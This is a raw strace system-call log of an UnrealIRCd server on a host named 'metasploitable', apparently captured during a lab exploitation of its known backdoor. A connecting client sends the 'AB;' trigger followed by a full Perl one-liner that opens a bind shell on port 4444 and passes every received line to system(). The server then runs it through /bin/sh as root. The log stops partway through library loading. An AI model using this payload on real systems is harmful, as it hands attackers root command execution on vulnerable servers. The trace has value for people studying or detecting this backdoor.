4519  07:08:39.639117 select(1024, [2 3 4 7 9], [], NULL, {0, 490000}) = 1 (in [2], left {0, 320000})

4519  07:08:39.802437 clock_gettime(CLOCK_MONOTONIC, {929, 619458275}) = 0

4519  07:08:39.802459 accept(2, 0, NULL) = 8

4519  07:08:39.802480 getpeername(8, {sa_family=AF_INET, sin_port=htons(39657), sin_addr=inet_addr("10.0.2.4")}, [16]) = 0

4519  07:08:39.802513 fcntl64(8, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:08:39.802525 fcntl64(8, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:08:39.802539 setsockopt(8, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0

4519  07:08:39.802552 setsockopt(8, SOL_SOCKET, SO_RCVBUF, [8192], 4) = 0

4519  07:08:39.802614 setsockopt(8, SOL_SOCKET, SO_SNDBUF, [8192], 4) = 0

4519  07:08:39.802627 getsockopt(8, SOL_IP, IP_OPTIONS, "", [0]) = 0

4519  07:08:39.802642 setsockopt(8, SOL_IP, IP_OPTIONS, NULL, 0) = 0

4519  07:08:39.802659 clock_gettime(CLOCK_MONOTONIC, {929, 619672661}) = 0

4519  07:08:39.802671 socket(PF_INET, SOCK_DGRAM, IPPROTO_IP) = 10

4519  07:08:39.802684 fcntl64(10, F_GETFL) = 0x2 (flags O_RDWR)

4519  07:08:39.802694 fcntl64(10, F_SETFL, O_RDWR|O_NONBLOCK) = 0

4519  07:08:39.802703 fcntl64(10, F_SETFD, FD_CLOEXEC) = 0

4519  07:08:39.802713 connect(10, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, 16) = 0

4519  07:08:39.802729 send(10, "2l\1\0\0\1\0\0\0\0\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1", 39, MSG_NOSIGNAL) = 39

4519  07:08:39.802791 accept(2, 0, NULL) = -1 EAGAIN (Resource temporarily unavailable)

4519  07:08:39.802849 gettimeofday({1495624119, 802853}, NULL) = 0

4519  07:08:39.802862 select(1024, [2 3 4 5 6 7 9 10], [], NULL, {1, 0}) = 1 (in [10], left {1, 0})

4519  07:08:39.806683 clock_gettime(CLOCK_MONOTONIC, {929, 623703134}) = 0

4519  07:08:39.806718 recvfrom(10, "2l\201\203\0\1\0\0\0\1\0\0\0014\0012\0010\00210\7in-addr\4arpa\0\0\f\0\1\300\22\0\6\0\1\0\0\0\365\0A\10prisoner\4iana\3org\0\nhostmaster\froot-servers\300AwsD\225\0\0\7\10\0\0\3\204\0\t:\200\0\t:\200", 513, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("132.70.60.124")}, [16]) = 116

4519  07:08:39.806760 close(10)         = 0

4519  07:08:39.806776 recvfrom(-1, 0xbfbaddf7, 513, 0, 0xbfbadff8, 0xbfbaddf0) = -1 EBADF (Bad file descriptor)

4519  07:08:39.806821 send(8, ":irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...\r\n:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn\'t resolve your hostname; using your IP address instead\r\n", 174, 0) = 174

4519  07:08:39.806911 time(NULL)        = 1495624119

4519  07:08:39.806938 time(NULL)        = 1495624119

4519  07:08:39.806950 gettimeofday({1495624119, 806954}, NULL) = 0

4519  07:08:39.806963 select(1024, [2], [], NULL, {0, 0}) = 0 (Timeout)

4519  07:08:39.807058 clock_gettime(CLOCK_MONOTONIC, {929, 624072012}) = 0

4519  07:08:39.807070 gettimeofday({1495624119, 807074}, NULL) = 0

4519  07:08:39.807081 select(1024, [2 3 4 7 9], [], NULL, {1, 0}) = 0 (Timeout)

4519  07:08:40.802369 clock_gettime(CLOCK_MONOTONIC, {930, 619446958}) = 0

4519  07:08:40.802532 gettimeofday({1495624120, 802558}, NULL) = 0

4519  07:08:40.802599 select(1024, [2 3 4 5 6 7 8 9], [], NULL, {1, 0}) = 1 (in [8], left {1, 0})

4519  07:08:40.802668 clock_gettime(CLOCK_MONOTONIC, {930, 619686853}) = 0

4519  07:08:40.802696 recv(8, "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n", 8192, 0) = 244

4519  07:08:40.802734 rt_sigaction(SIGINT, {SIG_IGN}, {0x8062280, [HUP INT], 0}, 8) = 0

4519  07:08:40.802756 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

4519  07:08:40.802768 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

4519  07:08:40.802783 clone(child_stack=0, flags=CLONE_PARENT_SETTID|SIGCHLD, parent_tidptr=0xbfbae034) = 5340

5340  07:08:40.802850 rt_sigaction(SIGINT, {0x8062280, [HUP INT], 0}, NULL, 8) = 0

5340  07:08:40.802864 rt_sigaction(SIGQUIT, {SIG_IGN}, NULL, 8) = 0

5340  07:08:40.802874 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5340  07:08:40.802888 execve("/bin/sh", ["sh", "-c", "AB;perl -MIO -e \'$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};\'\n"], [/* 14 vars */]) = 0

5340  07:08:40.803086 brk(0)            = 0x80f9000

5340  07:08:40.803109 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.803126 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f27000

5340  07:08:40.803141 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.803158 open("/etc/ld.so.cache", O_RDONLY) = 1

5340  07:08:40.803171 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5340  07:08:40.803189 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1f000

5340  07:08:40.803199 close(1)          = 0

5340  07:08:40.803210 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.803225 open("/lib/libncurses.so.5", O_RDONLY) = 1

5340  07:08:40.803238 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\220\0\0004\0\0\0h\344\2\0\0\0\0\0004\0 \0\4\0(\0\32\0\31\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0T\305\2\0T\305\2\0\5\0\0\0\0\20\0\0\1\0\0\0T\305\2\0T\325\2\0T\325\2\0004\36\0\0 \"\0\0\6\0\0\0\0\20\0\0\2\0\0\0\34\335\2\0\34\355\2\0\34\355\2\0\330\0\0\0\330\0\0\0\6\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0\t\2\0\0&\2\0\0z\1\0\0L\0\0\0\0\0\0\0\0\0\0\0\25\0\0\0\333\1\0\0\0\0\0\0\0\0\0\0\t\2\0\0\20\2\0\0E\1\0\0\0\0\0\0\0\0\0\0T\0\0\0\367\1\0\0\0\0\0\0\0\0\0\0\306\1\0\0L\1\0\0\203\0\0\0\236\1\0\0\0\0\0\0\0\0\0\0\320\0\0\0005\0\0\0\233\1\0\0\375\0\0\0\265\0\0\0\0\0\0\0\267\0\0\0\0\0\0\0\246\1\0\0\33\1\0\0\300\1\0\0\356\0\0\0\223\0\0\0@\1\0\0\365\1\0\0\23\2\0\0O\0\0\0\303\1\0\0\0\0\0\0\0\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\225\0\0\0|\0\0\0\0\0\0\0x\0\0\0\364\1\0\0\0\0\0\0\21\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0^\1\0\0\0\0\0\0\22\2\0\0\0\0\0\0\371\0\0\0\33\0\0\0f\0\0\0\37\1\0\0\222\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\354\0\0\0\261\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\36\2\0\0\0\0\0\0\5\0\0\0\364\0\0\0\0\0\0\0R\0\0\0", 512) = 512

5340  07:08:40.803331 fstat64(1, {st_mode=S_IFREG|0644, st_size=190584, ...}) = 0

5340  07:08:40.803349 mmap2(NULL, 194420, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eef000

5340  07:08:40.803360 mmap2(0xb7f1c000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x2c) = 0xb7f1c000

5340  07:08:40.803377 close(1)          = 0

5340  07:08:40.803389 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.803402 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5340  07:08:40.803416 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5340  07:08:40.803585 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5340  07:08:40.803603 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eeb000

5340  07:08:40.803619 mmap2(0xb7eed000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7eed000

5340  07:08:40.803634 close(1)          = 0

5340  07:08:40.803646 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.803660 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5340  07:08:40.803674 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5340  07:08:40.803761 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5340  07:08:40.803778 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eea000

5340  07:08:40.803791 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d9b000

5340  07:08:40.803802 mmap2(0xb7ee4000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ee4000

5340  07:08:40.803816 mmap2(0xb7ee7000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ee7000

5340  07:08:40.803829 close(1)          = 0

5340  07:08:40.803851 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d9a000

5340  07:08:40.803863 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d9a6b0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

5340  07:08:40.803917 mprotect(0xb7ee4000, 4096, PROT_READ) = 0

5340  07:08:40.803990 munmap(0xb7f1f000, 29913) = 0

5340  07:08:40.804033 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5340  07:08:40.804047 open("/dev/tty", O_RDWR|O_NONBLOCK|O_LARGEFILE) = -1 ENXIO (No such device or address)

5340  07:08:40.804067 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe60020) = -1 ENOTTY (Inappropriate ioctl for device)

5340  07:08:40.804098 brk(0)            = 0x80f9000

5340  07:08:40.804108 brk(0x80fa000)    = 0x80fa000

5340  07:08:40.804119 brk(0x80fb000)    = 0x80fb000

5340  07:08:40.804135 getuid32()        = 0

5340  07:08:40.804144 getgid32()        = 0

5340  07:08:40.804153 geteuid32()       = 0

5340  07:08:40.804162 getegid32()       = 0

5340  07:08:40.804175 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5340  07:08:40.804188 time(NULL)        = 1495624120

5340  07:08:40.804200 brk(0x80fc000)    = 0x80fc000

5340  07:08:40.804214 brk(0x80fd000)    = 0x80fd000

5340  07:08:40.804234 open("/proc/meminfo", O_RDONLY) = 1

5340  07:08:40.804255 fstat64(1, {st_mode=S_IFREG|0444, st_size=0, ...}) = 0

5340  07:08:40.804272 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f26000

5340  07:08:40.804284 read(1, "MemTotal:      1035240 kB\nMemFree:        655840 kB\nBuffers:         63136 kB\nCached:         161316 kB\nSwapCached:          0 kB\nActive:         251564 kB\nInactive:       101816 kB\nHighTotal:      131008 kB\nHighFree:          240 kB\nLowTotal:       904232 kB\nLowFree:        655600 kB\nSwapTotal:           0 kB\nSwapFree:            0 kB\nDirty:            4924 kB\nWriteback:           0 kB\nAnonPages:      128980 kB\nMapped:          52004 kB\nSlab:            14672 kB\nSReclaimable:     6772 kB\nSUnreclaim:       7900 kB\nPageTables:       1956 kB\nNFS_Unstable:        0 kB\nBounce:              0 kB\nCommitLimit:    517620 kB\nCommitted_AS:   635396 kB\nVmallocTotal:   118776 kB\nVmallocUsed:      3420 kB\nVmallocChunk:   114760 kB\nHugePages_Total:     0\nHugePages_Free:      0\nHugePages_Rsvd:      0\nHugePages_Surp:      0\nHugepagesize:     2048 kB\n", 1024) = 846

5340  07:08:40.804380 close(1)          = 0

5340  07:08:40.804391 munmap(0xb7f26000, 4096) = 0

5340  07:08:40.804403 brk(0x80fe000)    = 0x80fe000

5340  07:08:40.804436 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5340  07:08:40.804478 rt_sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}, 8) = 0

5340  07:08:40.804491 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5340  07:08:40.804519 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5340  07:08:40.804531 rt_sigaction(SIGQUIT, {SIG_DFL}, {SIG_IGN}, 8) = 0

5340  07:08:40.804542 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_DFL}, 8) = 0

5340  07:08:40.804556 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5340  07:08:40.804567 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5340  07:08:40.804580 uname({sys="Linux", node="metasploitable", ...}) = 0

5340  07:08:40.804626 stat64("/", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0

5340  07:08:40.804644 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5340  07:08:40.804662 brk(0x8100000)    = 0x8100000

5340  07:08:40.804673 getcwd("/etc/unreal", 4096) = 12

5340  07:08:40.804688 getpid()          = 5340

5340  07:08:40.804703 getppid()         = 4519

5340  07:08:40.804718 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5340  07:08:40.804737 stat64("/sbin/sh", 0xbfe5fff8) = -1 ENOENT (No such file or directory)

5340  07:08:40.804750 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5340  07:08:40.804767 stat64("/bin/sh", {st_mode=S_IFREG|0755, st_size=701808, ...}) = 0

5340  07:08:40.804790 socket(PF_FILE, SOCK_STREAM, 0) = 1

5340  07:08:40.804803 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5340  07:08:40.804814 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5340  07:08:40.804836 close(1)          = 0

5340  07:08:40.804847 socket(PF_FILE, SOCK_STREAM, 0) = 1

5340  07:08:40.804857 fcntl64(1, F_SETFL, O_RDWR|O_NONBLOCK) = 0

5340  07:08:40.804867 connect(1, {sa_family=AF_FILE, path="/var/run/nscd/socket"}, 110) = -1 ENOENT (No such file or directory)

5340  07:08:40.804885 close(1)          = 0

5340  07:08:40.804897 open("/etc/nsswitch.conf", O_RDONLY) = 1

5340  07:08:40.804911 fstat64(1, {st_mode=S_IFREG|0644, st_size=475, ...}) = 0

5340  07:08:40.805013 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f26000

5340  07:08:40.805056 read(1, "# /etc/nsswitch.conf\n#\n# Example configuration of GNU Name Service Switch functionality.\n# If you have the `glibc-doc-reference\' and `info\' packages installed, try:\n# `info libc \"Name Service Switch\"\' for information about this file.\n\npasswd:         compat\ngroup:          compat\nshadow:         compat\n\nhosts:          files dns\nnetworks:       files\n\nprotocols:      db files\nservices:       db files\nethers:         db files\nrpc:            db files\n\nnetgroup:       nis\n", 4096) = 475

5340  07:08:40.805135 read(1, "", 4096) = 0

5340  07:08:40.805145 close(1)          = 0

5340  07:08:40.805154 munmap(0xb7f26000, 4096) = 0

5340  07:08:40.805170 open("/etc/ld.so.cache", O_RDONLY) = 1

5340  07:08:40.805182 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5340  07:08:40.805198 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1f000

5340  07:08:40.805208 close(1)          = 0

5340  07:08:40.805218 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.805233 open("/lib/tls/i686/cmov/libnss_compat.so.2", O_RDONLY) = 1

5340  07:08:40.805267 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@\16\0\0004\0\0\0\204r\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0001a\0\0001a\0\0001a\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\274c\0\0\274c\0\0\5\0\0\0\0\20\0\0\1\0\0\0\340n\0\0\340~\0\0\340~\0\0\250\2\0\0h\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\364n\0\0\364~\0\0\364~\0\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5340  07:08:40.805422 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5340  07:08:40.805440 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d91000

5340  07:08:40.805451 mmap2(0xb7d98000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d98000

5340  07:08:40.805467 close(1)          = 0

5340  07:08:40.805479 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.805491 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5340  07:08:40.805569 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5340  07:08:40.805684 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5340  07:08:40.805701 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d79000

5340  07:08:40.805712 mmap2(0xb7d8d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d8d000

5340  07:08:40.805727 mmap2(0xb7d8f000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d8f000

5340  07:08:40.805741 close(1)          = 0

5340  07:08:40.805767 munmap(0xb7f1f000, 29913) = 0

5340  07:08:40.805784 open("/etc/ld.so.cache", O_RDONLY) = 1

5340  07:08:40.805797 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5340  07:08:40.805812 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f1f000

5340  07:08:40.805822 close(1)          = 0

5340  07:08:40.805832 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5340  07:08:40.805847 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5340  07:08:40.805860 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5340  07:08:40.805950 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5340  07:08:40.805967 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6f000

5340  07:08:40.805978 mmap2(0xb7d77000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d77000

